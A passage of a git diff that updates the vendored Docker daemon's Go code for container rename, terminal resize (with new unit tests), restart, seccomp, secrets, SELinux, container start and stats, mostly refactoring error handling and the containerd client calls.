v, newName+k) } @@ -67,10 +68,10 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint daemon.reserveName(container.ID, oldName) for k, v := range links { - daemon.nameIndex.Reserve(oldName+k, v.ID) + daemon.containersReplica.ReserveName(oldName+k, v.ID) daemon.linkIndex.link(container, v, oldName+k) daemon.linkIndex.unlink(newName+k, v, container) - daemon.nameIndex.Release(newName + k) + daemon.containersReplica.ReleaseName(newName + k) } daemon.releaseName(newName) } @@ -78,10 +79,10 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { for k, v := range links { daemon.linkIndex.unlink(oldName+k, v, container) - daemon.nameIndex.Release(oldName + k) + daemon.containersReplica.ReleaseName(oldName + k) } daemon.releaseName(oldName) - if err = container.ToDisk(); err != nil { + if err = container.CheckpointTo(daemon.containersReplica); err != nil { return err } @@ -98,14 +99,14 @@ func (daemon *Daemon) ContainerRename(oldName, newName string) error { if err != nil { container.Name = oldName container.NetworkSettings.IsAnonymousEndpoint = oldIsAnonymousEndpoint - if e := container.ToDisk(); e != nil { + if e := container.CheckpointTo(daemon.containersReplica); e != nil { logrus.Errorf("%s: Failed in writing to Disk on rename failure: %v", container.ID, e) } } }() sid = container.NetworkSettings.SandboxID - if daemon.netController != nil { + if sid != "" && daemon.netController != nil { sb, err = daemon.netController.SandboxByID(sid) if err != nil { return err diff --git a/vendor/github.com/docker/docker/daemon/resize.go b/vendor/github.com/docker/docker/daemon/resize.go index 747353852e..21240650f8 100644 --- a/vendor/github.com/docker/docker/daemon/resize.go +++ b/vendor/github.com/docker/docker/daemon/resize.go @@ -1,7 +1,9 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" + "time" "github.com/docker/docker/libcontainerd" ) @@ -15,10 +17,10 @@ func (daemon *Daemon) ContainerResize(name string, height, width int) error { } if !container.IsRunning() { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } - if err = daemon.containerd.Resize(container.ID, libcontainerd.InitFriendlyName, width, height); err == nil { + if err = daemon.containerd.ResizeTerminal(context.Background(), container.ID, libcontainerd.InitProcessName, width, height); err == nil { attributes := map[string]string{ "height": fmt.Sprintf("%d", height), "width": fmt.Sprintf("%d", width), @@ -36,5 +38,13 @@ func (daemon *Daemon) ContainerExecResize(name string, height, width int) error if err != nil { return err } - return daemon.containerd.Resize(ec.ContainerID, ec.ID, width, height) + // TODO: the timeout is hardcoded here, it would be more flexible to make it + // a parameter in resize request context, which would need API changes. + timeout := 10 * time.Second + select { + case <-ec.Started: + return daemon.containerd.ResizeTerminal(context.Background(), ec.ContainerID, ec.ID, width, height) + case <-time.After(timeout): + return fmt.Errorf("timeout waiting for exec session ready") + } } diff --git a/vendor/github.com/docker/docker/daemon/resize_test.go b/vendor/github.com/docker/docker/daemon/resize_test.go new file mode 100644 index 0000000000..edfe9d3ed1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/resize_test.go @@ -0,0 +1,103 @@ +// +build linux + +package daemon + +import ( + "context" + "testing" + + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "gotest.tools/assert" +) + +// This test simply verify that when a wrong ID used, a specific error should be returned for exec resize. +func TestExecResizeNoSuchExec(t *testing.T) { + n := "TestExecResize" + d := &Daemon{ + execCommands: exec.NewStore(), + } + c := &container.Container{ + ExecCommands: exec.NewStore(), + } + ec := &exec.Config{ + ID: n, + } + d.registerExecCommand(c, ec) + err := d.ContainerExecResize("nil", 24, 8) + assert.ErrorContains(t, err, "No such exec instance") +} + +type execResizeMockContainerdClient struct { + MockContainerdClient + ProcessID string + ContainerID string + Width int + Height int +} + +func (c *execResizeMockContainerdClient) ResizeTerminal(ctx context.Context, containerID, processID string, width, height int) error { + c.ProcessID = processID + c.ContainerID = containerID + c.Width = width + c.Height = height + return nil +} + +// This test is to make sure that when exec context is ready, resize should call ResizeTerminal via containerd client. +func TestExecResize(t *testing.T) { + n := "TestExecResize" + width := 24 + height := 8 + ec := &exec.Config{ + ID: n, + ContainerID: n, + Started: make(chan struct{}), + } + close(ec.Started) + mc := &execResizeMockContainerdClient{} + d := &Daemon{ + execCommands: exec.NewStore(), + containerd: mc, + containers: container.NewMemoryStore(), + } + c := &container.Container{ + ExecCommands: exec.NewStore(), + State: &container.State{Running: true}, + } + d.containers.Add(n, c) + d.registerExecCommand(c, ec) + err := d.ContainerExecResize(n, height, width) + assert.NilError(t, err) + assert.Equal(t, mc.Width, width) + assert.Equal(t, mc.Height, height) + assert.Equal(t, mc.ProcessID, n) + assert.Equal(t, mc.ContainerID, n) +} + +// This test is to make sure that when exec context is not ready, a timeout error should happen. +// TODO: the expect running time for this test is 10s, which would be too long for unit test. +func TestExecResizeTimeout(t *testing.T) { + n := "TestExecResize" + width := 24 + height := 8 + ec := &exec.Config{ + ID: n, + ContainerID: n, + Started: make(chan struct{}), + } + mc := &execResizeMockContainerdClient{} + d := &Daemon{ + execCommands: exec.NewStore(), + containerd: mc, + containers: container.NewMemoryStore(), + } + c := &container.Container{ + ExecCommands: exec.NewStore(), + State: &container.State{Running: true}, + } + d.containers.Add(n, c) + d.registerExecCommand(c, ec) + err := d.ContainerExecResize(n, height, width) + assert.ErrorContains(t, err, "timeout waiting for exec session ready") +} diff --git a/vendor/github.com/docker/docker/daemon/restart.go b/vendor/github.com/docker/docker/daemon/restart.go index 79292f3752..0f06dea267 100644 --- a/vendor/github.com/docker/docker/daemon/restart.go +++ b/vendor/github.com/docker/docker/daemon/restart.go @@ -1,10 +1,10 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" - "github.com/Sirupsen/logrus" "github.com/docker/docker/container" + "github.com/sirupsen/logrus" ) // ContainerRestart stops and starts a container. It attempts to @@ -52,7 +52,7 @@ func (daemon *Daemon) containerRestart(container *container.Container, seconds i container.HostConfig.AutoRemove = autoRemove // containerStop will write HostConfig to disk, we shall restore AutoRemove // in disk too - if toDiskErr := container.ToDiskLocking(); toDiskErr != nil { + if toDiskErr := daemon.checkpointAndSave(container); toDiskErr != nil { logrus.Errorf("Write container to disk error: %v", toDiskErr) } diff --git a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go index ff1127b6c2..3855c7830e 100644 --- a/vendor/github.com/docker/docker/daemon/seccomp_disabled.go +++ b/vendor/github.com/docker/docker/daemon/seccomp_disabled.go @@ -1,6 +1,6 @@ // +build linux,!seccomp -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/seccomp_linux.go b/vendor/github.com/docker/docker/daemon/seccomp_linux.go index 7f16733d95..66ab8c768c 100644 --- a/vendor/github.com/docker/docker/daemon/seccomp_linux.go +++ b/vendor/github.com/docker/docker/daemon/seccomp_linux.go @@ -1,20 +1,20 @@ // +build linux,seccomp -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" - "github.com/Sirupsen/logrus" "github.com/docker/docker/container" "github.com/docker/docker/profiles/seccomp" "github.com/opencontainers/runtime-spec/specs-go" + "github.com/sirupsen/logrus" ) var supportsSeccomp = true func setSeccomp(daemon *Daemon, rs *specs.Spec, c *container.Container) error { - var profile *specs.Seccomp + var profile *specs.LinuxSeccomp var err error if c.HostConfig.Privileged { diff --git a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go index b3691e96af..a323fe0be1 100644 --- a/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/seccomp_unsupported.go @@ -1,5 +1,5 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" var supportsSeccomp = false diff --git a/vendor/github.com/docker/docker/daemon/secrets.go b/vendor/github.com/docker/docker/daemon/secrets.go index 355cb1e139..6d368a9fd7 100644 --- a/vendor/github.com/docker/docker/daemon/secrets.go +++ b/vendor/github.com/docker/docker/daemon/secrets.go @@ -1,23 +1,10 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "github.com/Sirupsen/logrus" swarmtypes "github.com/docker/docker/api/types/swarm" - "github.com/docker/swarmkit/agent/exec" + "github.com/sirupsen/logrus" ) -// SetContainerSecretStore sets the secret store backend for the container -func (daemon *Daemon) SetContainerSecretStore(name string, store exec.SecretGetter) error { - c, err := daemon.GetContainer(name) - if err != nil { - return err - } - - c.SecretStore = store - - return nil -} - // SetContainerSecretReferences sets the container secret references needed func (daemon *Daemon) SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error { if !secretsSupported() && len(refs) > 0 { diff --git a/vendor/github.com/docker/docker/daemon/secrets_linux.go b/vendor/github.com/docker/docker/daemon/secrets_linux.go index fca4e12598..2be70be31c 100644 --- a/vendor/github.com/docker/docker/daemon/secrets_linux.go +++ b/vendor/github.com/docker/docker/daemon/secrets_linux.go @@ -1,6 +1,4 @@ -// +build linux - -package daemon +package daemon // import "github.com/docker/docker/daemon" func secretsSupported() bool { return true diff --git a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go index d6f36fda1e..edad69c569 100644 --- a/vendor/github.com/docker/docker/daemon/secrets_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/secrets_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux +// +build !linux,!windows -package daemon +package daemon // import "github.com/docker/docker/daemon" func secretsSupported() bool { return false diff --git a/vendor/github.com/docker/docker/daemon/secrets_windows.go b/vendor/github.com/docker/docker/daemon/secrets_windows.go new file mode 100644 index 0000000000..2be70be31c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/secrets_windows.go @@ -0,0 +1,5 @@ +package daemon // import "github.com/docker/docker/daemon" + +func secretsSupported() bool { + return true +} diff --git a/vendor/github.com/docker/docker/daemon/selinux_linux.go b/vendor/github.com/docker/docker/daemon/selinux_linux.go index 83a3447111..f87b30b738 100644 --- a/vendor/github.com/docker/docker/daemon/selinux_linux.go +++ b/vendor/github.com/docker/docker/daemon/selinux_linux.go @@ -1,17 +1,15 @@ -// +build linux +package daemon // import "github.com/docker/docker/daemon" -package daemon - -import "github.com/opencontainers/runc/libcontainer/selinux" +import "github.com/opencontainers/selinux/go-selinux" func selinuxSetDisabled() { selinux.SetDisabled() } func selinuxFreeLxcContexts(label string) { - selinux.FreeLxcContexts(label) + selinux.ReleaseLabel(label) } func selinuxEnabled() bool { - return selinux.SelinuxEnabled() + return selinux.GetEnabled() } diff --git a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go index 25a56ad157..49d0d13bce 100644 --- a/vendor/github.com/docker/docker/daemon/selinux_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/selinux_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" func selinuxSetDisabled() { } diff --git a/vendor/github.com/docker/docker/daemon/start.go b/vendor/github.com/docker/docker/daemon/start.go index 6c94fd5482..c00bd9ceb2 100644 --- a/vendor/github.com/docker/docker/daemon/start.go +++ b/vendor/github.com/docker/docker/daemon/start.go @@ -1,27 +1,23 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "net/http" + "context" "runtime" - "strings" - "syscall" "time" - "google.golang.org/grpc" - - "github.com/Sirupsen/logrus" - apierrors "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/runconfig" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/mount" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // ContainerStart starts a container. func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.HostConfig, checkpoint string, checkpointDir string) error { if checkpoint != "" && !daemon.HasExperimental() { - return apierrors.NewBadRequestError(fmt.Errorf("checkpoint is only supported in experimental mode")) + return errdefs.InvalidParameter(errors.New("checkpoint is only supported in experimental mode")) } container, err := daemon.GetContainer(name) @@ -29,13 +25,26 @@ func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.Hos return err } - if container.IsPaused() { - return fmt.Errorf("Cannot start a paused container, try unpause instead.") + validateState := func() error { + container.Lock() + defer container.Unlock() + + if container.Paused { + return errdefs.Conflict(errors.New("cannot start a paused container, try unpause instead")) + } + + if container.Running { + return containerNotModifiedError{running: true} + } + + if container.RemovalInProgress || container.Dead { + return errdefs.Conflict(errors.New("container is marked for removal and cannot be started")) + } + return nil } - if container.IsRunning() { - err := fmt.Errorf("Container already started") - return apierrors.NewErrorWithStatusCode(err, http.StatusNotModified) + if err := validateState(); err != nil { + return err } // Windows does not have the backwards compatibility issue here. @@ -46,52 +55,46 @@ func (daemon *Daemon) ContainerStart(name string, hostConfig *containertypes.Hos logrus.Warn("DEPRECATED: Setting host configuration options when the container starts is deprecated and has been removed in Docker 1.12") oldNetworkMode := container.HostConfig.NetworkMode if err := daemon.setSecurityOptions(container, hostConfig); err != nil { - return err + return errdefs.InvalidParameter(err) } if err := daemon.mergeAndVerifyLogConfig(&hostConfig.LogConfig); err != nil { - return err + return errdefs.InvalidParameter(err) } if err := daemon.setHostConfig(container, hostConfig); err != nil { - return err + return errdefs.InvalidParameter(err) } newNetworkMode := container.HostConfig.NetworkMode if string(oldNetworkMode) != string(newNetworkMode) { // if user has change the network mode on starting, clean up the // old networks. It is a deprecated feature and has been removed in Docker 1.12 container.NetworkSettings.Networks = nil - if err := container.ToDisk(); err != nil { - return err + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + return errdefs.System(err) } } container.InitDNSHostConfig() } } else { if hostConfig != nil { - return fmt.Errorf("Supplying a hostconfig on start is not supported. It should be supplied on create") + return errdefs.InvalidParameter(errors.New("Supplying a hostconfig on start is not supported. It should be supplied on create")) } } // check if hostConfig is in line with the current system settings. // It may happen cgroups are umounted or the like. - if _, err = daemon.verifyContainerSettings(container.HostConfig, nil, false); err != nil { - return err + if _, err = daemon.verifyContainerSettings(container.OS, container.HostConfig, nil, false); err != nil { + return errdefs.InvalidParameter(err) } // Adapt for old containers in case we have updates in this function and // old containers never have chance to call the new function in create stage. if hostConfig != nil { if err := daemon.adaptContainerSettings(container.HostConfig, false); err != nil { - return err + return errdefs.InvalidParameter(err) } } - return daemon.containerStart(container, checkpoint, checkpointDir, true) } -// Start starts a container -func (daemon *Daemon) Start(container *container.Container) error { - return daemon.containerStart(container, "", "", true) -} - // containerStart prepares the container to run by setting up everything the // container needs, such as storage and networking, as well as links // between containers. The container is left waiting for a signal to @@ -106,7 +109,12 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint } if container.RemovalInProgress || container.Dead { - return fmt.Errorf("Container is marked for removal and cannot be started.") + return errdefs.Conflict(errors.New("container is marked for removal and cannot be started")) + } + + if checkpointDir != "" { + // TODO(mlaventure): how would we support that? + return errdefs.Forbidden(errors.New("custom checkpointdir is not supported")) } // if we encounter an error during start we need to ensure that any other @@ -118,8 +126,9 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint if container.ExitCode() == 0 { container.SetExitCode(128) } - container.ToDisk() - + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.Errorf("%s: failed saving state on start failure: %v", container.ID, err) + } container.Reset(false) daemon.Cleanup(container) @@ -138,61 +147,65 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint return err } - // Make sure NetworkMode has an acceptable value. We do this to ensure - // backwards API compatibility. - container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) - if err := daemon.initializeNetworking(container); err != nil { return err } spec, err := daemon.createSpec(container) if err != nil { + return errdefs.System(err) + } + + if resetRestartManager { + container.ResetRestartManager(true) + } + + if daemon.saveApparmorConfig(container); err != nil { return err } + if checkpoint != "" { + checkpointDir, err = getCheckpointDir(checkpointDir, checkpoint, container.Name, container.ID, container.CheckpointDir(), false) + if err != nil { + return err + } + } + createOptions, err := daemon.getLibcontainerdCreateOptions(container) if err != nil { return err } - if resetRestartManager { - container.ResetRestartManager(true) + err = daemon.containerd.Create(context.Background(), container.ID, spec, createOptions) + if err != nil { + return translateContainerdStartErr(container.Path, container.SetExitCode, err) } - if checkpointDir == "" { - checkpointDir = container.CheckpointDir() + // TODO(mlaventure): we need to specify checkpoint options here + pid, err := daemon.containerd.Start(context.Background(), container.ID, checkpointDir, + container.StreamConfig.Stdin() != nil || container.Config.Tty, + container.InitializeStdio) + if err != nil { + if err := daemon.containerd.Delete(context.Background(), container.ID); err != nil { + logrus.WithError(err).WithField("container", container.ID). + Error("failed to delete failed start container") + } + return translateContainerdStartErr(container.Path, container.SetExitCode, err) } - if err := daemon.containerd.Create(container.ID, checkpoint, checkpointDir, *spec, container.InitializeStdio, createOptions...); err != nil { - errDesc := grpc.ErrorDesc(err) - contains := func(s1, s2 string) bool { - return strings.Contains(strings.ToLower(s1), s2) - } - logrus.Errorf("Create container failed with error: %s", errDesc) - // if we receive an internal error from the initial start of a container then lets - // return it instead of entering the restart loop - // set to 127 for container cmd not found/does not exist) - if contains(errDesc, container.Path) && - (contains(errDesc, "executable file not found") || - contains(errDesc, "no such file or directory") || - contains(errDesc, "system cannot find the file specified")) { - container.SetExitCode(127) - } - // set to 126 for container cmd can't be invoked errors - if contains(errDesc, syscall.EACCES.Error()) { - container.SetExitCode(126) - } + container.SetRunning(pid, true) + container.HasBeenManuallyStopped = false + container.HasBeenStartedBefore = true + daemon.setStateCounter(container) - // attempted to mount a file onto a directory, or a directory onto a file, maybe from user specified bind mounts - if contains(errDesc, syscall.ENOTDIR.Error()) { - errDesc += ": Are you trying to mount a directory onto a file (or vice-versa)? Check if the specified host path exists and is the expected type" - container.SetExitCode(127) - } + daemon.initHealthMonitor(container) - return fmt.Errorf("%s", errDesc) + if err := container.CheckpointTo(daemon.containersReplica); err != nil { + logrus.WithError(err).WithField("container", container.ID). + Errorf("failed to store container") } + daemon.LogContainerEvent(container, "start") containerActions.WithValues("start").UpdateSince(start) return nil @@ -203,12 +216,14 @@ func (daemon *Daemon) containerStart(container *container.Container, checkpoint func (daemon *Daemon) Cleanup(container *container.Container) { daemon.releaseNetwork(container) - container.UnmountIpcMounts(detachMounted) + if err := container.UnmountIpcMount(detachMounted); err != nil { + logrus.Warnf("%s cleanup: failed to unmount IPC: %s", container.ID, err) + } if err := daemon.conditionalUnmountOnCleanup(container); err != nil { // FIXME: remove once reference counting for graphdrivers has been refactored // Ensure that all the mounts are gone - if mountid, err := daemon.layerStore.GetMountID(container.ID); err == nil { + if mountid, err := daemon.imageService.GetLayerMountID(container.ID, container.OS); err == nil { daemon.cleanupMountsByID(mountid) } } @@ -217,14 +232,23 @@ func (daemon *Daemon) Cleanup(container *container.Container) { logrus.Warnf("%s cleanup: failed to unmount secrets: %s", container.ID, err) } + if err := mount.RecursiveUnmount(container.Root); err != nil { + logrus.WithError(err).WithField("container", container.ID).Warn("Error while cleaning up container resource mounts.") + } + for _, eConfig := range container.ExecCommands.Commands() { daemon.unregisterExecCommand(container, eConfig) } - if container.BaseFS != "" { + if container.BaseFS != nil && container.BaseFS.Path() != "" { if err := container.UnmountVolumes(daemon.LogVolumeEvent); err != nil { logrus.Warnf("%s cleanup: Failed to umount volumes: %v", container.ID, err) } } + container.CancelAttachContext() + + if err := daemon.containerd.Delete(context.Background(), container.ID); err != nil { + logrus.Errorf("%s cleanup: failed to delete container from containerd: %v", container.ID, err) + } } diff --git a/vendor/github.com/docker/docker/daemon/start_unix.go b/vendor/github.com/docker/docker/daemon/start_unix.go index 6bbe485075..e680b95f42 100644 --- a/vendor/github.com/docker/docker/daemon/start_unix.go +++ b/vendor/github.com/docker/docker/daemon/start_unix.go @@ -1,31 +1,57 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" + "os/exec" + "path/filepath" + "github.com/containerd/containerd/runtime/linux/runctypes" "github.com/docker/docker/container" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) -func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { - createOptions := []libcontainerd.CreateOption{} +func (daemon *Daemon) getRuntimeScript(container *container.Container) (string, error) { + name := container.HostConfig.Runtime + rt := daemon.configStore.GetRuntime(name) + if rt == nil { + return "", errdefs.InvalidParameter(errors.Errorf("no such runtime '%s'", name)) + } + + if len(rt.Args) > 0 { + // First check that the target exist, as using it in a script won't + // give us the right error + if _, err := exec.LookPath(rt.Path); err != nil { + return "", translateContainerdStartErr(container.Path, container.SetExitCode, err) + } + return filepath.Join(daemon.configStore.Root, "runtimes", name), nil + } + return rt.Path, nil +} +// getLibcontainerdCreateOptions callers must hold a lock on the container +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) (interface{}, error) { // Ensure a runtime has been assigned to this container if container.HostConfig.Runtime == "" { - container.HostConfig.Runtime = stockRuntimeName - container.ToDisk() + container.HostConfig.Runtime = daemon.configStore.GetDefaultRuntimeName() + container.CheckpointTo(daemon.containersReplica) } - rt := daemon.configStore.GetRuntime(container.HostConfig.Runtime) - if rt == nil { - return nil, fmt.Errorf("no such runtime '%s'", container.HostConfig.Runtime) + path, err := daemon.getRuntimeScript(container) + if err != nil { + return nil, err } + opts := &runctypes.RuncOptions{ + Runtime: path, + RuntimeRoot: filepath.Join(daemon.configStore.ExecRoot, + fmt.Sprintf("runtime-%s", container.HostConfig.Runtime)), + } + if UsingSystemd(daemon.configStore) { - rt.Args = append(rt.Args, "--systemd-cgroup=true") + opts.SystemdCgroup = true } - createOptions = append(createOptions, libcontainerd.WithRuntime(rt.Path, rt.Args)) - return createOptions, nil + return opts, nil } diff --git a/vendor/github.com/docker/docker/daemon/start_windows.go b/vendor/github.com/docker/docker/daemon/start_windows.go index faa7575224..f4606f7a60 100644 --- a/vendor/github.com/docker/docker/daemon/start_windows.go +++ b/vendor/github.com/docker/docker/daemon/start_windows.go @@ -1,205 +1,38 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "fmt" - "io/ioutil" - "path/filepath" - "strings" - + "github.com/Microsoft/opengcs/client" "github.com/docker/docker/container" - "github.com/docker/docker/layer" - "github.com/docker/docker/libcontainerd" - "golang.org/x/sys/windows/registry" -) - -const ( - credentialSpecRegistryLocation = `SOFTWARE\Microsoft\Windows NT\CurrentVersion\Virtualization\Containers\CredentialSpecs` - credentialSpecFileLocation = "CredentialSpecs" ) -func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) ([]libcontainerd.CreateOption, error) { - createOptions := []libcontainerd.CreateOption{} - - // Are we going to run as a Hyper-V container? - hvOpts := &libcontainerd.HyperVIsolationOption{} - if container.HostConfig.Isolation.IsDefault() { - // Container is set to use the default, so take the default from the daemon configuration - hvOpts.IsHyperV = daemon.defaultIsolation.IsHyperV() - } else { - // Container is requesting an isolation mode. Honour it. - hvOpts.IsHyperV = container.HostConfig.Isolation.IsHyperV() - } - - // Generate the layer folder of the layer options - layerOpts := &libcontainerd.LayerOption{} - m, err := container.RWLayer.Metadata() - if err != nil { - return nil, fmt.Errorf("failed to get layer metadata - %s", err) - } - if hvOpts.IsHyperV { - hvOpts.SandboxPath = filepath.Dir(m["dir"]) - } - - layerOpts.LayerFolderPath = m["dir"] - - // Generate the layer paths of the layer options - img, err := daemon.imageStore.Get(container.ImageID) - if err != nil { - return nil, fmt.Errorf("failed to graph.Get on ImageID %s - %s", container.ImageID, err) - } - // Get the layer path for each layer. - max := len(img.RootFS.DiffIDs) - for i := 1; i <= max; i++ { - img.RootFS.DiffIDs = img.RootFS.DiffIDs[:i] - layerPath, err := layer.GetLayerPath(daemon.layerStore, img.RootFS.ChainID()) - if err != nil { - return nil, fmt.Errorf("failed to get layer path from graphdriver %s for ImageID %s - %s", daemon.layerStore, img.RootFS.ChainID(), err) +func (daemon *Daemon) getLibcontainerdCreateOptions(container *container.Container) (interface{}, error) { + // LCOW options. + if container.OS == "linux" { + config := &client.Config{} + if err := config.GenerateDefault(daemon.configStore.GraphOptions); err != nil { + return nil, err } - // Reverse order, expecting parent most first - layerOpts.LayerPaths = append([]string{layerPath}, layerOpts.LayerPaths...) - } - - // Get endpoints for the libnetwork allocated networks to the container - var epList []string - AllowUnqualifiedDNSQuery := false - gwHNSID := "" - if container.NetworkSettings != nil { - for n := range container.NetworkSettings.Networks { - sn, err := daemon.FindNetwork(n) - if err != nil { - continue - } - - ep, err := container.GetEndpointInNetwork(sn) - if err != nil { - continue - } - - data, err := ep.DriverInfo() - if err != nil { - continue - } - - if data["GW_INFO"] != nil { - gwInfo := data["GW_INFO"].(map[string]interface{}) - if gwInfo["hnsid"] != nil { - gwHNSID = gwInfo["hnsid"].(string) - } - } - - if data["hnsid"] != nil { - epList = append(epList, data["hnsid"].(string)) - } - - if data["AllowUnqualifiedDNSQuery"] != nil { - AllowUnqualifiedDNSQuery = true + // Override from user-supplied options. + for k, v := range container.HostConfig.StorageOpt { + switch k { + case "lcow.kirdpath": + config.KirdPath = v + case "lcow.kernel": + config.KernelFile = v + case "lcow.initrd": + config.InitrdFile = v + case "lcow.vhdx": + config.Vhdx = v + case "lcow.bootparameters": + config.BootParameters = v } } - } - - if gwHNSID != "" { - epList = append(epList, gwHNSID) - } - - // Read and add credentials from the security options if a credential spec has been provided. - if container.HostConfig.SecurityOpt != nil { - for _, sOpt := range container.HostConfig.SecurityOpt { - sOpt = strings.ToLower(sOpt) - if !strings.Contains(sOpt, "=") { - return nil, fmt.Errorf("invalid security option: no equals sign in supplied value %s", sOpt) - } - var splitsOpt []string - splitsOpt = strings.SplitN(sOpt, "=", 2) - if len(splitsOpt) != 2 { - return nil, fmt.Errorf("invalid security option: %s", sOpt) - } - if splitsOpt[0] != "credentialspec" { - return nil, fmt.Errorf("security option not supported: %s", splitsOpt[0]) - } - - credentialsOpts := &libcontainerd.CredentialsOption{} - var ( - match bool - csValue string - err error - ) - if match, csValue = getCredentialSpec("file://", splitsOpt[1]); match { - if csValue == "" { - return nil, fmt.Errorf("no value supplied for file:// credential spec security option") - } - if credentialsOpts.Credentials, err = readCredentialSpecFile(container.ID, daemon.root, filepath.Clean(csValue)); err != nil { - return nil, err - } - } else if match, csValue = getCredentialSpec("registry://", splitsOpt[1]); match { - if csValue == "" { - return nil, fmt.Errorf("no value supplied for registry:// credential spec security option") - } - if credentialsOpts.Credentials, err = readCredentialSpecRegistry(container.ID, csValue); err != nil { - return nil, err - } - } else { - return nil, fmt.Errorf("invalid credential spec security option - value must be prefixed file:// or registry:// followed by a value") - } - createOptions = append(createOptions, credentialsOpts) + if err := config.Validate(); err != nil { + return nil, err } - } - // Now add the remaining options. - createOptions = append(createOptions, &libcontainerd.FlushOption{IgnoreFlushesDuringBoot: !container.HasBeenStartedBefore}) - createOptions = append(createOptions, hvOpts) - createOptions = append(createOptions, layerOpts) - if epList != nil { - createOptions = append(createOptions, &libcontainerd.NetworkEndpointsOption{Endpoints: epList, AllowUnqualifiedDNSQuery: AllowUnqualifiedDNSQuery}) + return config, nil } - return createOptions, nil -} - -// getCredentialSpec is a helper function to get the value of a credential spec supplied -// on the CLI, stripping the prefix -func getCredentialSpec(prefix, value string) (bool, string) { - if strings.HasPrefix(value, prefix) { - return true, strings.TrimPrefix(value, prefix) - } - return false, "" -} - -// readCredentialSpecRegistry is a helper function to read a credential spec from -// the registry. If not found, we return an empty string and warn in the log. -// This allows for staging on machines which do not have the necessary components. -func readCredentialSpecRegistry(id, name string) (string, error) { - var ( - k registry.Key - err error - val string - ) - if k, err = registry.OpenKey(registry.LOCAL_MACHINE, credentialSpecRegistryLocation, registry.QUERY_VALUE); err != nil { - return "", fmt.Errorf("failed handling spec %q for container %s - %s could not be opened", name, id, credentialSpecRegistryLocation) - } - if val, _, err = k.GetStringValue(name); err != nil { - if err == registry.ErrNotExist { - return "", fmt.Errorf("credential spec %q for container %s as it was not found", name, id) - } - return "", fmt.Errorf("error %v reading credential spec %q from registry for container %s", err, name, id) - } - return val, nil -} - -// readCredentialSpecFile is a helper function to read a credential spec from -// a file. If not found, we return an empty string and warn in the log. -// This allows for staging on machines which do not have the necessary components. -func readCredentialSpecFile(id, root, location string) (string, error) { - if filepath.IsAbs(location) { - return "", fmt.Errorf("invalid credential spec - file:// path cannot be absolute") - } - base := filepath.Join(root, credentialSpecFileLocation) - full := filepath.Join(base, location) - if !strings.HasPrefix(full, base) { - return "", fmt.Errorf("invalid credential spec - file:// path must be under %s", base) - } - bcontents, err := ioutil.ReadFile(full) - if err != nil { - return "", fmt.Errorf("credential spec '%s' for container %s as the file could not be read: %q", full, id, err) - } - return string(bcontents[:]), nil + return nil, nil } diff --git a/vendor/github.com/docker/docker/daemon/stats.go b/vendor/github.com/docker/docker/daemon/stats.go index 51f5962d17..eb23e272ae 100644 --- a/vendor/github.com/docker/docker/daemon/stats.go +++ b/vendor/github.com/docker/docker/daemon/stats.go @@ -1,14 +1,12 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "encoding/json" "errors" - "fmt" "runtime" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/versions" @@ -20,9 +18,6 @@ import ( // ContainerStats writes information about the container to the stream // given in the config object. func (daemon *Daemon) ContainerStats(ctx context.Context, prefixOrName string, config *backend.ContainerStatsConfig) error { - if runtime.GOOS == "solaris" { - return fmt.Errorf("%+v does not support stats", runtime.GOOS) - } // Engine API version (used for backwards compatibility) apiVersion := config.Version @@ -33,7 +28,9 @@ func (daemon *Daemon) ContainerStats(ctx context.Context, 